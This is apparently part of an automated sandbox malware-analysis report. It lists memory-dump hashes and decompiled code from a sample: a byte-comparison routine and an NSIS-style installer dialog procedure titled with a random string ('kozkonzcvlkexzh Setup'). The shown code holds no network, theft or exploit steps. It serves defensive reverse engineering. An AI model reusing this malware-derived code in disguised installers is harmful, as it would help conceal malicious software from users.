                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                • Instruction ID: 2083d964b3183f57a0d3fd909884ee548d6d7061eb39dd1fe6437e0fcef10a12
                                                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                • Instruction Fuzzy Hash: 45C163322055930AEB4DCA798C3413EBBE2DB966F1327176DD8B2DF1D8EF10D5249A60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 10005EA5, Relevance: .3, Instructions: 323COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E10005EA5(void* __edx, void* __esi) {
				signed char _t177;
				void* _t178;
				signed char _t179;
				signed char _t180;
				signed char _t181;
				signed char _t183;
				signed char _t184;
				void* _t228;
				void* _t278;
				void* _t281;
				void* _t283;
				void* _t285;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t322;

				_t322 = __esi;
				_t278 = __edx;
				_t177 =  *(__esi - 0x1c);
				if(_t177 ==  *(__edx - 0x1c)) {
					_t228 = 0;
					L10:
					if(_t228 != 0) {
						L78:
						_t178 = _t228;
						return _t178;
					}
					_t179 =  *(_t322 - 0x18);
					if(_t179 ==  *(_t278 - 0x18)) {
						_t228 = 0;
						L21:
						if(_t228 != 0) {
							goto L78;
						}
						_t180 =  *(_t322 - 0x14);
						if(_t180 ==  *(_t278 - 0x14)) {
							_t228 = 0;
							L32:
							if(_t228 != 0) {
								goto L78;
							}
							_t181 =  *(_t322 - 0x10);
							if(_t181 ==  *(_t278 - 0x10)) {
								_t228 = 0;
								L43:
								if(_t228 != 0) {
									goto L78;
								}
								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
									_t228 = 0;
									L54:
									if(_t228 != 0) {
										goto L78;
									}
									_t183 =  *(_t322 - 8);
									if(_t183 ==  *(_t278 - 8)) {
										_t228 = 0;
										L65:
										if(_t228 != 0) {
											goto L78;
										}
										_t184 =  *(_t322 - 4);
										if(_t184 ==  *(_t278 - 4)) {
											_t228 = 0;
											L76:
											if(_t228 == 0) {
												_t228 = 0;
											}
											goto L78;
										}
										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
										if(_t281 == 0) {
											L69:
											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
											if(_t283 == 0) {
												L71:
												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
												if(_t285 == 0) {
													L73:
													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
													if(_t228 != 0) {
														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
													}
													goto L76;
												}
												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
												if(_t228 != 0) {
													goto L78;
												}
												goto L73;
											}
											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L71;
										}
										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L69;
									}
									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
									if(_t287 == 0) {
										L58:
										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
										if(_t289 == 0) {
											L60:
											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
											if(_t291 == 0) {
												L62:
												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
												if(_t228 != 0) {
													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
												}
												goto L65;
											}
											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L62;
										}
										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L60;
									}
									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L58;
								}
								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
								if(_t293 == 0) {
									L47:
									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
									if(_t295 == 0) {
										L49:
										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
										if(_t297 == 0) {
											L51:
											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
											if(_t228 != 0) {
												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
											}
											goto L54;
										}
										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L51;
									}
									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L49;
								}
								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L47;
							}
							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
							if(_t299 == 0) {
								L36:
								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
								if(_t301 == 0) {
									L38:
									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
									if(_t303 == 0) {
										L40:
										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
										if(_t228 != 0) {
											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
										}
										goto L43;
									}
									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L40;
								}
								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L38;
							}
							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L36;
						}
						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
						if(_t305 == 0) {
							L25:
							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
							if(_t307 == 0) {
								L27:
								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
								if(_t309 == 0) {
									L29:
									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
									if(_t228 != 0) {
										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
									}
									goto L32;
								}
								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L29;
							}
							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L27;
						}
						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L25;
					}
					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
					if(_t311 == 0) {
						L14:
						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
						if(_t313 == 0) {
							L16:
							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
							if(_t315 == 0) {
								L18:
								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
								if(_t228 != 0) {
									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
								}
								goto L21;
							}
							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L18;
						}
						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L16;
					}
					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L14;
				}
				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
				if(_t317 == 0) {
					L3:
					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
					if(_t319 == 0) {
						L5:
						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
						if(_t321 == 0) {
							L7:
							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
							if(_t228 != 0) {
								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
							}
							goto L10;
						}
						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L7;
					}
					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L5;
				}
				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
				if(_t228 != 0) {
					goto L78;
				}
				goto L3;
			}


































                                                0x10005ea5
                                                0x10005ea5
                                                0x10005ea5
                                                0x10005eab
                                                0x10005f32
                                                0x10005f34
                                                0x10005f36
                                                0x100062b5
                                                0x100062b5
                                                0x100070a6
                                                0x100070a6
                                                0x10005f3c
                                                0x10005f42
                                                0x10005fc9
                                                0x10005fcb
                                                0x10005fcd
                                                0x00000000
                                                0x00000000
                                                0x10005fd3
                                                0x10005fd9
                                                0x10006060
                                                0x10006062
                                                0x10006064
                                                0x00000000
                                                0x00000000
                                                0x1000606a
                                                0x10006070
                                                0x100060f7
                                                0x100060f9
                                                0x100060fb
                                                0x00000000
                                                0x00000000
                                                0x10006107
                                                0x1000618f
                                                0x10006191
                                                0x10006193
                                                0x00000000
                                                0x00000000
                                                0x10006199
                                                0x1000619f
                                                0x10006226
                                                0x10006228
                                                0x1000622a
                                                0x00000000
                                                0x00000000
                                                0x10006230
                                                0x10006236
                                                0x100062ad
                                                0x100062af
                                                0x100062b1
                                                0x100062b3
                                                0x100062b3
                                                0x00000000
                                                0x100062b1
                                                0x1000623f
                                                0x10006241
                                                0x10006255
                                                0x1000625d
                                                0x1000625f
                                                0x10006273
                                                0x1000627b
                                                0x1000627d
                                                0x10006291
                                                0x10006299
                                                0x1000629b
                                                0x100062a4
                                                0x100062a4
                                                0x00000000
                                                0x1000629b
                                                0x10006286
                                                0x1000628f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x1000628f
                                                0x10006268
                                                0x10006271
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006271
                                                0x1000624a
                                                0x10006253
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006253
                                                0x100061ac
                                                0x100061ae
                                                0x100061c6
                                                0x100061ce
                                                0x100061d0
                                                0x100061e8
                                                0x100061f0
                                                0x100061f2
                                                0x1000620a
                                                0x10006212
                                                0x10006214
                                                0x1000621d
                                                0x1000621d
                                                0x00000000
                                                0x10006214
                                                0x100061fb
                                                0x10006204
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006204
                                                0x100061d9
                                                0x100061e2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x100061e2
                                                0x100061b7
                                                0x100061c0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x100061c0
                                                0x10006115
                                                0x10006117
                                                0x1000612f
                                                0x10006137
                                                0x10006139
                                                0x10006151
                                                0x10006159
                                                0x1000615b
                                                0x10006173
                                                0x1000617b
                                                0x1000617d
                                                0x10006186
                                                0x10006186
                                                0x00000000
                                                0x1000617d
                                                0x10006164
                                                0x1000616d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x1000616d
                                                0x10006142
                                                0x1000614b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x1000614b
                                                0x10006120
                                                0x10006129
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006129
                                                0x1000607d
                                                0x1000607f
                                                0x10006097
                                                0x1000609f
                                                0x100060a1
                                                0x100060b9
                                                0x100060c1
                                                0x100060c3
                                                0x100060db
                                                0x100060e3
                                                0x100060e5
                                                0x100060ee
                                                0x100060ee
                                                0x00000000
                                                0x100060e5
                                                0x100060cc
                                                0x100060d5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x100060d5
                                                0x100060aa
                                                0x100060b3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x100060b3
                                                0x10006088
                                                0x10006091
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006091
                                                0x10005fe6
                                                0x10005fe8
                                                0x10006000
                                                0x10006008
                                                0x1000600a
                                                0x10006022
                                                0x1000602a
                                                0x1000602c
                                                0x10006044
                                                0x1000604c
                                                0x1000604e
                                                0x10006057
                                                0x10006057
                                                0x00000000
                                                0x1000604e
                                                0x10006035
                                                0x1000603e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x1000603e
                                                0x10006013
                                                0x1000601c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x1000601c
                                                0x10005ff1
                                                0x10005ffa
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10005ffa
                                                0x10005f4f
                                                0x10005f51
                                                0x10005f69
                                                0x10005f71
                                                0x10005f73
                                                0x10005f8b
                                                0x10005f93
                                                0x10005f95
                                                0x10005fad
                                                0x10005fb5
                                                0x10005fb7
                                                0x10005fc0
                                                0x10005fc0
                                                0x00000000
                                                0x10005fb7
                                                0x10005f9e
                                                0x10005fa7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10005fa7
                                                0x10005f7c
                                                0x10005f85
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10005f85
                                                0x10005f5a
                                                0x10005f63
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10005f63
                                                0x10005eb8
                                                0x10005eba
                                                0x10005ed2
                                                0x10005eda
                                                0x10005edc
                                                0x10005ef4
                                                0x10005efc
                                                0x10005efe
                                                0x10005f16
                                                0x10005f1e
                                                0x10005f20
                                                0x10005f29
                                                0x10005f29
                                                0x00000000
                                                0x10005f20
                                                0x10005f07
                                                0x10005f10
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10005f10
                                                0x10005ee5
                                                0x10005eee
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10005eee
                                                0x10005ec3
                                                0x10005ecc
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                • Instruction ID: f37e42eeb5402f7c6449bca691c0e58474bf824e6ab10249124d34993b56c141
                                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                • Instruction Fuzzy Hash: 3EC1703220559309EB4DCA79883413FBBE2EB966F132B176DD4B2CF5C9EF24D5249620
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1001A616, Relevance: .1, Instructions: 61COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                                                • Instruction ID: a5f5cc404345051d9a3d43732892c5c43a2385a91314192d1658d7f645f45817
                                                • Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                                                • Instruction Fuzzy Hash: 0111C272A10209AFCB10DBAAD8888AEF7FDEF466D4B5540A5F804DB214E774DEC0C660
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1001A706, Relevance: .0, Instructions: 26COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                                                • Instruction ID: f4d788da18cf8e267c38a3c1811d86f470bc5a631a0a0da5908c50b93dabbf40
                                                • Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                                                • Instruction Fuzzy Hash: FAE092357645049FCB44CBA8CC41D55B3F4EB09230B114290FC15CB3E0EA34FE80D650
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1001A744, Relevance: .0, Instructions: 23COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                                • Instruction ID: 2df1a6d1e3cca68c9d16f3148c796fc1ccc26e8a365bcac769081ee74b5b76f8
                                                • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                                • Instruction Fuzzy Hash: 47E08C3A7146508BC360DB59C980942F3F9FB8A2F072A486AEC89DB751C230FD808A90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1001A6C7, Relevance: .0, Instructions: 7COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403981, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 84%
                                                			E00403981(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42051c = _t35;
					if(_t115 == 0x110) {
						 *0x423f48 = _t125;
						 *0x420530 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f4f8 = _t91;
						E00403E54(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423728);
						 *0x42370c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42051c = 1;
					}
					_t122 =  *0x4091ac; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423f60;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403EA0(0x40b);
						while(1) {
							_t37 =  *0x42051c;
							 *0x4091ac =  *0x4091ac + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091ac; // 0xffffffff
							__eflags = _t39 -  *0x423f64; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42370c - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x423f64; // 0x2
							__eflags =  *0x4091ac - _t44; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405BBA(_t116, _t125, _t130, 0x42c800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E54(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E54(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E54(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423fcc - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403E76(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f4f8, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423fcc - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x420530);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f4f8);
							}
							E00403E89();
							E00405B98(0x420538, "kozkonzcvlkexzh Setup");
							E00405BBA(0x420538, _t125, _t130,  &(0x420538[lstrlenA(0x420538)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420538);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423718);
									 *0x41fd08 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423f40,  *_t130 +  *0x423720 & 0x0000ffff, _t125,  *(0x4091b0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423718 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E54(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423718, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42370c - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x423718, 8);
									E00403EA0(0x405);
									goto L58;
								}
								__eflags =  *0x423fcc - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x423fc0 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423718);
						 *0x423f48 = _t133;
						EndDialog(_t125,  *0x41f900);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423718, 0x40f, 0, 1);
						__eflags =  *0x42370c - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420510, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420510,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403EBB(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423718, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423fcc - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f900 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E2D();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f900 = _t127;
										goto L21;
									}
									__eflags =  *0x4091ac - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423718);
						 *0x423718 = _a12;
						L58:
						if( *0x421538 == _t133) {
							_t142 =  *0x423718 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x421538 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}
































                                                0x0040398a
                                                0x00403993
                                                0x00403ad4
                                                0x00403ad8
                                                0x00403adc
                                                0x00403ade
                                                0x00403ae3
                                                0x00403aee
                                                0x00403af9
                                                0x00403afe
                                                0x00403b00
                                                0x00403b02
                                                0x00403b05
                                                0x00403b0a
                                                0x00403b18
                                                0x00403b25
                                                0x00403b2c
                                                0x00403b2c
                                                0x00403b2d
                                                0x00403b2d
                                                0x00403b32
                                                0x00403b38
                                                0x00403b3f
                                                0x00403b45
                                                0x00403b47
                                                0x00403b87
                                                0x00403b8c
                                                0x00403b91
                                                0x00403b91
                                                0x00403b96
                                                0x00403b9f
                                                0x00403ba1
                                                0x00403ba6
                                                0x00403bac
                                                0x00403bb0
                                                0x00403bb0
                                                0x00403bb5
                                                0x00403bbb
                                                0x00000000
                                                0x00000000
                                                0x00403bc1
                                                0x00403bc6
                                                0x00403bcc
                                                0x00000000
                                                0x00000000
                                                0x00403bd5
                                                0x00403bdd
                                                0x00403be2
                                                0x00403be5
                                                0x00403beb
                                                0x00403bf0
                                                0x00403bf3
                                                0x00403bf9
                                                0x00403bfe
                                                0x00403c01
                                                0x00403c07
